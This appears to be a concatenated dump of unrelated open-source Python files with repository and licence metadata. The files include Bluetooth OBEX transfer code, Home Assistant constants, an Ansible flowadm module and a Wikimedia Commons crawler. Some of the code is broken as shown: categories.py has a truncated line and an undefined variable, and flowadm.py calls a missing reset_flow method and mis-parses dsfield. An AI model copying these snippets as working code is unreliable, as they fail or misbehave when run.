if self.__error != _kOBEXSuccess:
raise OBEXError(self.__error, "error during SetPath request (%s)" %
errdesc(self.__error))
return self.__getresponse()
def _done(self):
return not self.__busy
def _finishedrequest(self, error, response):
if error in (_kOBEXSessionNoTransportError,
_kOBEXSessionTransportDiedError):
self.__closetransport()
self.__error = error
self.__response = response
self.__busy = False
_macutil.interruptwait()
def _setobexsession(self, session):
self.__obexsession = session
# Note that OBEXSession returns kOBEXSessionNotConnectedError if you don't
# send CONNECT before sending any other requests; this means the OBEXClient
# must send connect() before other requests, so this restriction is enforced
# in the Linux version as well, for consistency.
def __checkconnected(self):
if self.__client is None:
raise OBEXError(_kOBEXSessionNotConnectedError,
"must connect() before sending other requests")
def __closetransport(self):
if self.__client is not None:
try:
self.__client.RFCOMMChannel().closeChannel()
self.__client.RFCOMMChannel().getDevice().closeConnection()
except:
pass
self.__client = None
def __reset(self):
self.__busy = True
self.__error = None
self.__response = None
def __getresponse(self):
code = self.__response.responseCode()
rawheaders = _headersettodict(self.__response.allHeaders())
return _obexcommon.OBEXResponse(_cutresponsefinalbit(code), rawheaders)
def __del__(self):
if self.__client is not None:
self.__client.__del__()
super(OBEXClient, self).__del__()
# set method docstrings
definedmethods = locals() # i.e. defined methods in OBEXClient
for name, doc in _obexcommon._obexclientdocs.items():
try:
definedmethods[name].__doc__ = doc
except KeyError:
pass
class _BBOBEXClientDelegate(NSObject):
def initWithCallback_(self, cb_requestdone):
self = super(_BBOBEXClientDelegate, self).init()
self._cb_requestdone = cb_requestdone
return self
initWithCallback_ = objc.selector(initWithCallback_, signature="@@:@")
def __del__(self):
super(_BBOBEXClientDelegate, self).dealloc()
#
# Delegate methods follow. objc signatures for all methods must be set
# using objc.selector or else may get bus error.
#
# - (void)client:(BBBluetoothOBEXClient *)client
# didFinishConnectRequestWithError:(OBEXError)error
# response:(BBOBEXResponse *)response;
def client_didFinishConnectRequestWithError_response_(self, client, error,
response):
self._cb_requestdone(error, response)
client_didFinishConnectRequestWithError_response_ = objc.selector(
client_didFinishConnectRequestWithError_response_, signature="v@:@i@")
# - (void)client:(BBBluetoothOBEXClient *)client
# didFinishDisconnectRequestWithError:(OBEXError)error
# response:(BBOBEXResponse *)response;
def client_didFinishDisconnectRequestWithError_response_(self, client,
error, response):
self._cb_requestdone(error, response)
client_didFinishDisconnectRequestWithError_response_ = objc.selector(
client_didFinishDisconnectRequestWithError_response_,signature="v@:@i@")
# - (void)client:(BBBluetoothOBEXClient *)client
# didFinishPutRequestForStream:(NSInputStream *)inputStream
# error:(OBEXError)error
# response:(BBOBEXResponse *)response;
def client_didFinishPutRequestForStream_error_response_(self, client,
instream, error, response):
self._cb_requestdone(error, response)
client_didFinishPutRequestForStream_error_response_ = objc.selector(
client_didFinishPutRequestForStream_error_response_,signature="v@:@@i@")
# - (void)client:(BBBluetoothOBEXClient *)client
# didFinishGetRequestForStream:(NSOutputStream *)outputStream
# error:(OBEXError)error
# response:(BBOBEXResponse *)response;
def client_didFinishGetRequestForStream_error_response_(self, client,
outstream, error, response):
self._cb_requestdone(error, response)
client_didFinishGetRequestForStream_error_response_ = objc.selector(
client_didFinishGetRequestForStream_error_response_,signature="v@:@@i@")
# - (void)client:(BBBluetoothOBEXClient *)client
# didFinishSetPathRequestWithError:(OBEXError)error
# response:(BBOBEXResponse *)response;
def client_didFinishSetPathRequestWithError_response_(self, client, error,
response):
self._cb_requestdone(error, response)
client_didFinishSetPathRequestWithError_response_ = objc.selector(
client_didFinishSetPathRequestWithError_response_, signature="v@:@i@")
# client:didAbortRequestWithStream:error:response: not
# implemented since OBEXClient does not allow abort requests
# ------------------------------------------------------------------
def sendfile(address, channel, source):
if not _lightbluecommon._isbtaddr(address):
raise TypeError("address '%s' is not a valid bluetooth address" %
address)
if not isinstance(channel, int):
raise TypeError("channel must be int, was %s" % type(channel))
if not isinstance(source, types.StringTypes) and \
not hasattr(source, "read"):
raise TypeError("source must be string or file-like object with read() method")
if isinstance(source, types.StringTypes):
headers = {"name": source}
fileobj = file(source, "rb")
closefileobj = True
else:
if hasattr(source, "name"):
headers = {"name": source.name}
fileobj = source
closefileobj = False
client = OBEXClient(address, channel)
client.connect()
try:
resp = client.put(headers, fileobj)
finally:
if closefileobj:
fileobj.close()
try:
client.disconnect()
except:
pass # always ignore disconnection errors
if resp.code != _obexcommon.OK:
raise OBEXError("server denied the Put request")
# ------------------------------------------------------------------
class BBOBEXObjectPushServer(NSObject):
def initWithChannel_fileLikeObject_(self, channel, fileobject):
if not isinstance(channel, IOBluetoothRFCOMMChannel) and \
not isinstance(channel, OBEXSession):
raise TypeError("internal error, channel is of wrong type %s" %
type(channel))
if not hasattr(fileobject, "write"):
raise TypeError("fileobject must be file-like object with write() method")
self = super(BBOBEXObjectPushServer, self).init()
self.__fileobject = fileobject
self.__server = BBBluetoothOBEXServer.alloc().initWithIncomingRFCOMMChannel_delegate_(channel, self)
#BBBluetoothOBEXServer.setDebug_(True)
self.__error = None
self.__gotfile = False
self.__gotdisconnect = False
self.__disconnected = False
# for internal testing
if isinstance(channel, OBEXSession):
self.__server.performSelector_withObject_("setOBEXSession:",
channel)
return self
initWithChannel_fileLikeObject_ = objc.selector(
initWithChannel_fileLikeObject_, signature="@@:i@")
def run(self):
self.__server.run()
# wait until client sends a file, or an error occurs
_macutil.waituntil(lambda: self.__gotfile or self.__error is not None)
# wait briefly for a disconnect request (client may have decided to just
# close the connection without sending a disconnect request)
if self.__error is None:
ok = _macutil.waituntil(lambda: self.__gotdisconnect, 3)
if ok:
_macutil.waituntil(lambda: self.__disconnected)
# only raise OBEXError if file was not received
if not self.__gotfile:
if self.__error is not None:
raise OBEXError(self.__error[0], self.__error[1])
# if client connected but didn't send PUT
raise OBEXError(_kOBEXGeneralError, "client did not send a file")
def __del__(self):
super(BBOBEXObjectPushServer, self).dealloc()
#
# BBBluetoothOBEXClientDelegate methods follow.
# These enable this class to get callbacks when some event occurs on the
# server (e.g. got a new client request, or an error occurred, etc.).
#
# - (BOOL)server:(BBBluetoothOBEXServer *)server
# shouldHandleConnectRequest:(BBOBEXHeaderSet *)requestHeaders;
def server_shouldHandleConnectRequest_(self, server, requestheaders):
return True
server_shouldHandleConnectRequest_ = objc.selector(
server_shouldHandleConnectRequest_, signature="c@:@@")
# - (BOOL)server:(BBBluetoothOBEXServer *)server
# shouldHandleDisconnectRequest:(BBOBEXHeaderSet *)requestHeaders;
def server_shouldHandleDisconnectRequest_(self, server, requestheaders):
self.__gotdisconnect = True
_macutil.interruptwait()
return True
server_shouldHandleDisconnectRequest_ = objc.selector(
server_shouldHandleDisconnectRequest_, signature="c@:@@")
# - (void)serverDidHandleDisconnectRequest:(BBBluetoothOBEXServer *)server;
def serverDidHandleDisconnectRequest_(self, server):
self.__disconnected = True
_macutil.interruptwait()
serverDidHandleDisconnectRequest_ = objc.selector(
serverDidHandleDisconnectRequest_, signature="v@:@")
# - (NSOutputStream *)server:(BBBluetoothOBEXServer *)server
# shouldHandlePutRequest:(BBOBEXHeaderSet *)requestHeaders;
def server_shouldHandlePutRequest_(self, server, requestheaders):
#print "Incoming file:", requestHeaders.valueForNameHeader()
self.delegate = _macutil.BBFileLikeObjectWriter.alloc().initWithFileLikeObject_(self.__fileobject)
outstream = BBStreamingOutputStream.alloc().initWithDelegate_(self.delegate)
outstream.open()
return outstream
server_shouldHandlePutRequest_ = objc.selector(
server_shouldHandlePutRequest_, signature="@@:@@")
# - (void)server:(BBBluetoothOBEXServer *)server
# didHandlePutRequestForStream:(NSOutputStream *)outputStream
# requestWasAborted:(BOOL)aborted;
def server_didHandlePutRequestForStream_requestWasAborted_(self, server,
stream, aborted):
if aborted:
self.__error = (_kOBEXGeneralError, "client aborted file transfer")
else:
self.__gotfile = True
_macutil.interruptwait()
server_didHandlePutRequestForStream_requestWasAborted_ = objc.selector(
server_didHandlePutRequestForStream_requestWasAborted_,
signature="v@:@@c")
# - (void)server:(BBBluetoothOBEXServer *)server
# errorOccurred:(OBEXError)error
# description:(NSString *)description;
def server_errorOccurred_description_(self, server, error, desc):
self.__error = (error, desc)
_macutil.interruptwait()
server_errorOccurred_description_ = objc.selector(
server_errorOccurred_description_, signature="v@:@i@")
# ------------------------------------------------------------------
def recvfile(sock, dest):
if sock is None:
raise TypeError("Given socket is None")
if not isinstance(dest, (types.StringTypes, types.FileType)):
raise TypeError("dest must be string or file-like object with write() method")
if isinstance(dest, types.StringTypes):
fileobj = open(dest, "wb")
closefileobj = True
else:
fileobj = dest
closefileobj = False
try:
sock.listen(1)
conn, addr = sock.accept()
#print "A client connected:", addr
server = BBOBEXObjectPushServer.alloc().initWithChannel_fileLikeObject_(
conn._getchannel(), fileobj)
server.run()
conn.close()
finally:
if closefileobj:
fileobj.close()
| gpl-3.0 |
Teagan42/home-assistant | homeassistant/components/insteon/const.py | 2 | 2771 | """Constants used by insteon component."""
DOMAIN = "insteon"
INSTEON_ENTITIES = "entities"
CONF_IP_PORT = "ip_port"
CONF_HUB_USERNAME = "username"
CONF_HUB_PASSWORD = "password"
CONF_HUB_VERSION = "hub_version"
CONF_OVERRIDE = "device_override"
CONF_PLM_HUB_MSG = "Must configure either a PLM port or a Hub host"
CONF_CAT = "cat"
CONF_SUBCAT = "subcat"
CONF_FIRMWARE = "firmware"
CONF_PRODUCT_KEY = "product_key"
CONF_X10 = "x10_devices"
CONF_HOUSECODE = "housecode"
CONF_UNITCODE = "unitcode"
CONF_DIM_STEPS = "dim_steps"
CONF_X10_ALL_UNITS_OFF = "x10_all_units_off"
CONF_X10_ALL_LIGHTS_ON = "x10_all_lights_on"
CONF_X10_ALL_LIGHTS_OFF = "x10_all_lights_off"
SRV_ADD_ALL_LINK = "add_all_link"
SRV_DEL_ALL_LINK = "delete_all_link"
SRV_LOAD_ALDB = "load_all_link_database"
SRV_PRINT_ALDB = "print_all_link_database"
SRV_PRINT_IM_ALDB = "print_im_all_link_database"
SRV_X10_ALL_UNITS_OFF = "x10_all_units_off"
SRV_X10_ALL_LIGHTS_OFF = "x10_all_lights_off"
SRV_X10_ALL_LIGHTS_ON = "x10_all_lights_on"
SRV_ALL_LINK_GROUP = "group"
SRV_ALL_LINK_MODE = "mode"
SRV_LOAD_DB_RELOAD = "reload"
SRV_CONTROLLER = "controller"
SRV_RESPONDER = "responder"
SRV_HOUSECODE = "housecode"
SRV_SCENE_ON = "scene_on"
SRV_SCENE_OFF = "scene_off"
SIGNAL_LOAD_ALDB = "load_aldb"
SIGNAL_PRINT_ALDB = "print_aldb"
HOUSECODES = [
"a",
"b",
"c",
"d",
"e",
"f",
"g",
"h",
"i",
"j",
"k",
"l",
"m",
"n",
"o",
"p",
]
BUTTON_PRESSED_STATE_NAME = "onLevelButton"
EVENT_BUTTON_ON = "insteon.button_on"
EVENT_BUTTON_OFF = "insteon.button_off"
EVENT_CONF_BUTTON = "button"
STATE_NAME_LABEL_MAP = {
"keypadButtonA": "Button A",
"keypadButtonB": "Button B",
"keypadButtonC": "Button C",
"keypadButtonD": "Button D",
"keypadButtonE": "Button E",
"keypadButtonF": "Button F",
"keypadButtonG": "Button G",
"keypadButtonH": "Button H",
"keypadButtonMain": "Main",
"onOffButtonA": "Button A",
"onOffButtonB": "Button B",
"onOffButtonC": "Button C",
"onOffButtonD": "Button D",
"onOffButtonE": "Button E",
"onOffButtonF": "Button F",
"onOffButtonG": "Button G",
"onOffButtonH": "Button H",
"onOffButtonMain": "Main",
"fanOnLevel": "Fan",
"lightOnLevel": "Light",
"coolSetPoint": "Cool Set",
"heatSetPoint": "HeatSet",
"statusReport": "Status",
"generalSensor": "Sensor",
"motionSensor": "Motion",
"lightSensor": "Light",
"batterySensor": "Battery",
"dryLeakSensor": "Dry",
"wetLeakSensor": "Wet",
"heartbeatLeakSensor": "Heartbeat",
"openClosedRelay": "Relay",
"openClosedSensor": "Sensor",
"lightOnOff": "Light",
"outletTopOnOff": "Top",
"outletBottomOnOff": "Bottom",
"coverOpenLevel": "Cover",
}
| apache-2.0 |
Luthien123/aleph | aleph/processing/__init__.py | 3 | 1728 | import logging
from archivekit.ingest import Ingestor
from aleph.core import archive, celery
from aleph.processing.pipeline import make_pipeline # noqa
log = logging.getLogger(__name__)
@celery.task()
def ingest_url(collection_name, url, package_id=None, meta={}):
collection = archive.get(collection_name)
meta['source_url'] = url
log.info("Ingesting URL: %r to %r", url, collection)
ingest(collection, url, package_id=package_id, meta=meta)
def ingest(collection, something, package_id=None, meta={}):
for ingestor in Ingestor.analyze(something):
try:
if package_id is None:
package_id = ingestor.hash()
package = collection.get(package_id)
package.ingest(ingestor, meta=meta)
process_package.delay(collection.name, package.id)
except Exception, e:
log.exception(e)
finally:
ingestor.dispose()
@celery.task()
def process_collection(collection_name, overwrite=False):
collection = archive.get(collection_name)
for package in collection:
process_package.delay(collection_name, package.id,
overwrite=overwrite)
@celery.task()
def process_package(collection_name, package_id, overwrite=False):
collection = archive.get(collection_name)
package = collection.get(package_id)
if not package.exists():
log.warn("Package doesn't exist: %r", package_id)
log.info("Processing package: %r", package)
pipeline = make_pipeline(collection, overwrite=overwrite)
pipeline.process_package(package)
@celery.task()
def refresh_selectors(selectors):
from aleph.processing.entities import refresh
refresh(selectors)
| mit |
godfreyhe/flink | flink-python/pyflink/fn_execution/ResettableIO.py | 10 | 2606 | ################################################################################
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
import io
class ResettableIO(io.RawIOBase):
"""
Raw I/O implementation the input and output stream is resettable.
"""
def set_input_bytes(self, b):
self._input_bytes = b
self._input_offset = 0
self._size = len(b)
def readinto(self, b):
"""
Read up to len(b) bytes into the writable buffer *b* and return
the number of bytes read. If no bytes are available, None is returned.
"""
output_buffer_len = len(b)
remaining = self._size - self._input_offset
if remaining >= output_buffer_len:
b[:] = self._input_bytes[self._input_offset:self._input_offset + output_buffer_len]
self._input_offset += output_buffer_len
return output_buffer_len
elif remaining > 0:
b[:remaining] = self._input_bytes[self._input_offset:self._input_offset + remaining]
self._input_offset = self._size
return remaining
else:
return None
def set_output_stream(self, output_stream):
self._output_stream = output_stream
def write(self, b):
"""
Write the given bytes or pyarrow.Buffer object *b* to the underlying
output stream and return the number of bytes written.
"""
if isinstance(b, bytes):
self._output_stream.write(b)
else:
# pyarrow.Buffer
self._output_stream.write(b.to_pybytes())
return len(b)
def seekable(self):
return False
def readable(self):
return self._size - self._input_offset
def writable(self):
return True
| apache-2.0 |
Commonists/Commons2Data | categories.py | 1 | 2651 | # -*- coding: utf-8 -*-
import logging
import json
import sys
import requests
import pywikibot
from pywikibot import page
commons = pywikibot.Site('commons', 'commons')
tree = {}
nbCalls = 0
frequency = 50
# Logger logging on console and in debug
LOG = logging.getLogger("categories")
LOG_LEVEL = logging.DEBUG
consolehandler = logging.StreamHandler(stream=sys.stdout)
fmt = '%(asctime)s %(levelname)s %(message)s'
consolehandler.setFormatter(logging.Formatter(fmt))
consolehandler.setLevel(LOG_LEVEL)
LOG.addHandler(consolehandler)
LOG.setLevel(LOG_LEVEL)
def flush():
LOG.info("Writting")
with open ("tree.json", "w") as data:
json.dump(tree, data)
def build_tree(category, children_depth=0, parents_depth=0, with_files=False):
global nbCalls
nbCalls = nbCalls + 1
if (nbCalls % frequency) == 0:
flush()
if category not in tree:
LOG.info(category)
node = {}
parents = [p.title() for p in
page.Category(commons, category).categories()]
node["Parents"] = parents
children = [p.title() for p in
page.Category(commons, category).subcategories()]
node["Children"] = children
tree[category] = node
if children_depth > 0:
for child in children:
build_tree(child, children_depth-1, parents_depth)
if parents_depth > 0:
for parent in parents:
build_tree(parent, with_children, parents_depth-1)
if with_files:
for file in page.Category(commons, category).fil
def paintings_by_year():
taboo=[u"Paintings by artist by year",
"Paintings by country by year",
"Paintings by genre by year",
"Paintings by style by year",
"Paintings by technique by year",
"Paintings by year by artist",
"Paintings by year by country",
"Paintings not categorised by year",
"Paintings with years of production (artist)",
"Paintings of people by year",
"Paintings from the United States by year"]
''' "Properties": {
"P31": {
"Value": "Q3305213"
},
"P571": {
"Value": {
"Year":1912
}
}'''
motherCat = page.Category(commons, "Paintings by year")
for cat in motherCat.categories():
if cat.title() not in taboo:
tree[cat.title()]
def main():
categories =[u"Lena temp2"]
if len(tree) > 0:
LOG.info("Already %d elements",len(tree))
LOG.info("Building tree")
for category in categories:
build_tree(category, children_depth=1, parents_depth=1, with_files=True)
flush()
if __name__ == "__main__":
main()
| mit |
fishcorn/pylearn2 | pylearn2/scripts/datasets/make_cifar100_patches_8x8.py | 41 | 2282 | """
This script makes a dataset of two million approximately whitened patches,
extracted at random uniformly from the CIFAR-100 train dataset.
This script is intended to reproduce the preprocessing used by Adam Coates
et. al. in their work from the first half of 2011 on the CIFAR-10 and
STL-10 datasets.
"""
from __future__ import print_function
from pylearn2.utils import serial
from pylearn2.datasets import preprocessing
from pylearn2.datasets.cifar100 import CIFAR100
from pylearn2.utils import string
data_dir = string.preprocess('${PYLEARN2_DATA_PATH}')
print('Loading CIFAR-100 train dataset...')
data = CIFAR100(which_set='train')
print("Preparing output directory...")
patch_dir = data_dir + '/cifar100/cifar100_patches_8x8'
serial.mkdir(patch_dir)
README = open(patch_dir + '/README', 'w')
README.write("""
The .pkl files in this directory may be opened in python using
cPickle, pickle, or pylearn2.serial.load.
data.pkl contains a pylearn2 Dataset object defining an unlabeled
dataset of 2 million 8x8 approximately whitened, contrast-normalized
patches drawn uniformly at random from the CIFAR-100 train set.
preprocessor.pkl contains a pylearn2 Pipeline object that was used
to extract the patches and approximately whiten / contrast normalize
them. This object is necessary when extracting features for
supervised learning or test set classification, because the
extracted features must be computed using inputs that have been
whitened with the ZCA matrix learned and stored by this Pipeline.
They were created with the pylearn2 script make_cifar100_patches.py.
All other files in this directory, including this README, were
created by the same script and are necessary for the other files
to function correctly.
""")
README.close()
print("Preprocessing the data...")
pipeline = preprocessing.Pipeline()
pipeline.items.append(
preprocessing.ExtractPatches(patch_shape=(8, 8), num_patches=2*1000*1000))
pipeline.items.append(
preprocessing.GlobalContrastNormalization(sqrt_bias=10., use_std=True))
pipeline.items.append(preprocessing.ZCA())
data.apply_preprocessor(preprocessor=pipeline, can_fit=True)
data.use_design_loc(patch_dir + '/data.npy')
serial.save(patch_dir + '/data.pkl', data)
serial.save(patch_dir + '/preprocessor.pkl', pipeline)
| bsd-3-clause |
willthames/ansible | lib/ansible/modules/network/illumos/flowadm.py | 50 | 15277 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2016, Adam Števko <adam.stevko@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: flowadm
short_description: Manage bandwidth resource control and priority for protocols, services and zones on Solaris/illumos systems
description:
- Create/modify/remove networking bandwidth and associated resources for a type of traffic on a particular link.
version_added: "2.2"
author: Adam Števko (@xen0l)
options:
name:
description: >
- A flow is defined as a set of attributes based on Layer 3 and Layer 4
headers, which can be used to identify a protocol, service, or a zone.
required: true
aliases: [ 'flow' ]
link:
description:
- Specifiies a link to configure flow on.
required: false
local_ip:
description:
- Identifies a network flow by the local IP address.
required: false
remove_ip:
description:
- Identifies a network flow by the remote IP address.
required: false
transport:
description: >
- Specifies a Layer 4 protocol to be used. It is typically used in combination with I(local_port) to
identify the service that needs special attention.
required: false
local_port:
description:
- Identifies a service specified by the local port.
required: false
dsfield:
description: >
- Identifies the 8-bit differentiated services field (as defined in
RFC 2474). The optional dsfield_mask is used to state the bits of interest in
the differentiated services field when comparing with the dsfield
value. Both values must be in hexadecimal.
required: false
maxbw:
description: >
- Sets the full duplex bandwidth for the flow. The bandwidth is
specified as an integer with one of the scale suffixes(K, M, or G
for Kbps, Mbps, and Gbps). If no units are specified, the input
value will be read as Mbps.
required: false
priority:
description:
- Sets the relative priority for the flow.
required: false
default: 'medium'
choices: [ 'low', 'medium', 'high' ]
temporary:
description:
- Specifies that the configured flow is temporary. Temporary
flows do not persist across reboots.
required: false
default: false
choices: [ "true", "false" ]
state:
description:
- Create/delete/enable/disable an IP address on the network interface.
required: false
default: present
choices: [ 'absent', 'present', 'resetted' ]
'''
EXAMPLES = '''
# Limit SSH traffic to 100M via vnic0 interface
- flowadm:
link: vnic0
flow: ssh_out
transport: tcp
local_port: 22
maxbw: 100M
state: present
# Reset flow properties
- flowadm:
name: dns
state: resetted
# Configure policy for EF PHB (DSCP value of 101110 from RFC 2598) with a bandwidth of 500 Mbps and a high priority.
- flowadm:
link: bge0
dsfield: '0x2e:0xfc'
maxbw: 500M
priority: high
flow: efphb-flow
state: present
'''
RETURN = '''
name:
description: flow name
returned: always
type: string
sample: "http_drop"
link:
description: flow's link
returned: if link is defined
type: string
sample: "vnic0"
state:
description: state of the target
returned: always
type: string
sample: "present"
temporary:
description: flow's persistence
returned: always
type: boolean
sample: "True"
priority:
description: flow's priority
returned: if priority is defined
type: string
sample: "low"
transport:
description: flow's transport
returned: if transport is defined
type: string
sample: "tcp"
maxbw:
description: flow's maximum bandwidth
returned: if maxbw is defined
type: string
sample: "100M"
local_Ip:
description: flow's local IP address
returned: if local_ip is defined
type: string
sample: "10.0.0.42"
local_port:
description: flow's local port
returned: if local_port is defined
type: int
sample: 1337
remote_Ip:
description: flow's remote IP address
returned: if remote_ip is defined
type: string
sample: "10.0.0.42"
dsfield:
description: flow's differentiated services value
returned: if dsfield is defined
type: string
sample: "0x2e:0xfc"
'''
import socket
SUPPORTED_TRANSPORTS = ['tcp', 'udp', 'sctp', 'icmp', 'icmpv6']
SUPPORTED_PRIORITIES = ['low', 'medium', 'high']
SUPPORTED_ATTRIBUTES = ['local_ip', 'remote_ip', 'transport', 'local_port', 'dsfield']
SUPPORTPED_PROPERTIES = ['maxbw', 'priority']
class Flow(object):
def __init__(self, module):
self.module = module
self.name = module.params['name']
self.link = module.params['link']
self.local_ip = module.params['local_ip']
self.remote_ip = module.params['remote_ip']
self.transport = module.params['transport']
self.local_port = module.params['local_port']
self.dsfield = module.params['dsfield']
self.maxbw = module.params['maxbw']
self.priority = module.params['priority']
self.temporary = module.params['temporary']
self.state = module.params['state']
self._needs_updating = {
'maxbw': False,
'priority': False,
}
@classmethod
def is_valid_port(cls, port):
return 1 <= int(port) <= 65535
@classmethod
def is_valid_address(cls, ip):
if ip.count('/') == 1:
ip_address, netmask = ip.split('/')
else:
ip_address = ip
if len(ip_address.split('.')) == 4:
try:
socket.inet_pton(socket.AF_INET, ip_address)
except socket.error:
return False
if not 0 <= netmask <= 32:
return False
else:
try:
socket.inet_pton(socket.AF_INET6, ip_address)
except socket.error:
return False
if not 0 <= netmask <= 128:
return False
return True
@classmethod
def is_hex(cls, number):
try:
int(number, 16)
except ValueError:
return False
return True
@classmethod
def is_valid_dsfield(cls, dsfield):
dsmask = None
if dsfield.count(':') == 1:
dsval = dsfield.split(':')[0]
else:
dsval, dsmask = dsfield.split(':')
if dsmask and not 0x01 <= int(dsmask, 16) <= 0xff and not 0x01 <= int(dsval, 16) <= 0xff:
return False
elif not 0x01 <= int(dsval, 16) <= 0xff:
return False
return True
def flow_exists(self):
cmd = [self.module.get_bin_path('flowadm')]
cmd.append('show-flow')
cmd.append(self.name)
(rc, _, _) = self.module.run_command(cmd)
if rc == 0:
return True
else:
return False
def delete_flow(self):
cmd = [self.module.get_bin_path('flowadm')]
cmd.append('remove-flow')
if self.temporary:
cmd.append('-t')
cmd.append(self.name)
return self.module.run_command(cmd)
def create_flow(self):
cmd = [self.module.get_bin_path('flowadm')]
cmd.append('add-flow')
cmd.append('-l')
cmd.append(self.link)
if self.local_ip:
cmd.append('-a')
cmd.append('local_ip=' + self.local_ip)
if self.remote_ip:
cmd.append('-a')
cmd.append('remote_ip=' + self.remote_ip)
if self.transport:
cmd.append('-a')
cmd.append('transport=' + self.transport)
if self.local_port:
cmd.append('-a')
cmd.append('local_port=' + self.local_port)
if self.dsfield:
cmd.append('-a')
cmd.append('dsfield=' + self.dsfield)
if self.maxbw:
cmd.append('-p')
cmd.append('maxbw=' + self.maxbw)
if self.priority:
cmd.append('-p')
cmd.append('priority=' + self.priority)
if self.temporary:
cmd.append('-t')
cmd.append(self.name)
return self.module.run_command(cmd)
def _query_flow_props(self):
cmd = [self.module.get_bin_path('flowadm')]
cmd.append('show-flowprop')
cmd.append('-c')
cmd.append('-o')
cmd.append('property,possible')
cmd.append(self.name)
return self.module.run_command(cmd)
def flow_needs_udpating(self):
(rc, out, err) = self._query_flow_props()
NEEDS_UPDATING = False
if rc == 0:
properties = (line.split(':') for line in out.rstrip().split('\n'))
for prop, value in properties:
if prop == 'maxbw' and self.maxbw != value:
self._needs_updating.update({prop: True})
NEEDS_UPDATING = True
elif prop == 'priority' and self.priority != value:
self._needs_updating.update({prop: True})
NEEDS_UPDATING = True
return NEEDS_UPDATING
else:
self.module.fail_json(msg='Error while checking flow properties: %s' % err,
stderr=err,
rc=rc)
def update_flow(self):
cmd = [self.module.get_bin_path('flowadm')]
cmd.append('set-flowprop')
if self.maxbw and self._needs_updating['maxbw']:
cmd.append('-p')
cmd.append('maxbw=' + self.maxbw)
if self.priority and self._needs_updating['priority']:
cmd.append('-p')
cmd.append('priority=' + self.priority)
if self.temporary:
cmd.append('-t')
cmd.append(self.name)
return self.module.run_command(cmd)
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(required=True, aliases=['flow']),
link=dict(required=False),
local_ip=dict(required=False),
remote_ip=dict(required=False),
transport=dict(required=False, choices=SUPPORTED_TRANSPORTS),
local_port=dict(required=False),
dsfield=dict(required=False),
maxbw=dict(required=False),
priority=dict(required=False,
default='medium',
choices=SUPPORTED_PRIORITIES),
temporary=dict(default=False, type='bool'),
state=dict(required=False,
default='present',
choices=['absent', 'present', 'resetted']),
),
mutually_exclusive=[
('local_ip', 'remote_ip'),
('local_ip', 'transport'),
('local_ip', 'local_port'),
('local_ip', 'dsfield'),
('remote_ip', 'transport'),
('remote_ip', 'local_port'),
('remote_ip', 'dsfield'),
('transport', 'dsfield'),
('local_port', 'dsfield'),
],
supports_check_mode=True
)
flow = Flow(module)
rc = None
out = ''
err = ''
result = {}
result['name'] = flow.name
result['state'] = flow.state
result['temporary'] = flow.temporary
if flow.link:
result['link'] = flow.link
if flow.maxbw:
result['maxbw'] = flow.maxbw
if flow.priority:
result['priority'] = flow.priority
if flow.local_ip:
if flow.is_valid_address(flow.local_ip):
result['local_ip'] = flow.local_ip
if flow.remote_ip:
if flow.is_valid_address(flow.remote_ip):
result['remote_ip'] = flow.remote_ip
if flow.transport:
result['transport'] = flow.transport
if flow.local_port:
if flow.is_valid_port(flow.local_port):
result['local_port'] = flow.local_port
else:
module.fail_json(msg='Invalid port: %s' % flow.local_port,
rc=1)
if flow.dsfield:
if flow.is_valid_dsfield(flow.dsfield):
result['dsfield'] = flow.dsfield
else:
module.fail_json(msg='Invalid dsfield: %s' % flow.dsfield,
rc=1)
if flow.state == 'absent':
if flow.flow_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = flow.delete_flow()
if rc != 0:
module.fail_json(msg='Error while deleting flow: "%s"' % err,
name=flow.name,
stderr=err,
rc=rc)
elif flow.state == 'present':
if not flow.flow_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = flow.create_flow()
if rc != 0:
module.fail_json(msg='Error while creating flow: "%s"' % err,
name=flow.name,
stderr=err,
rc=rc)
else:
if flow.flow_needs_udpating():
(rc, out, err) = flow.update_flow()
if rc != 0:
module.fail_json(msg='Error while updating flow: "%s"' % err,
name=flow.name,
stderr=err,
rc=rc)
elif flow.state == 'resetted':
if flow.flow_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = flow.reset_flow()
if rc != 0:
module.fail_json(msg='Error while resetting flow: "%s"' % err,
name=flow.name,
stderr=err,
rc=rc)
if rc is None:
result['changed'] = False
else:
result['changed'] = True
if out:
result['stdout'] = out
if err:
result['stderr'] = err
module.exit_json(**result)
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
| gpl-3.0 |
imaculate/scikit-learn | examples/applications/plot_species_distribution_modeling.py | 55 | 7386 | """
=============================
Species distribution modeling
=============================
Modeling species' geographic distributions is an important
problem in conservation biology. In this example we
model the geographic distribution of two south american
mammals given past observations and 14 environmental
variables. Since we have only positive examples (there are
no unsuccessful observations), we cast this problem as a
density estimation problem and use the `OneClassSVM` provided
by the package `sklearn.svm` as our modeling tool.
The dataset is provided by Phillips et. al. (2006).
If available, the example uses
`basemap <http://matplotlib.org/basemap>`_
to plot the coast lines and national boundaries of South America.
The two species are:
- `"Bradypus variegatus"
<http://www.iucnredlist.org/details/3038/0>`_ ,
the Brown-throated Sloth.
- `"Microryzomys minutus"
<http://www.iucnredlist.org/details/13408/0>`_ ,
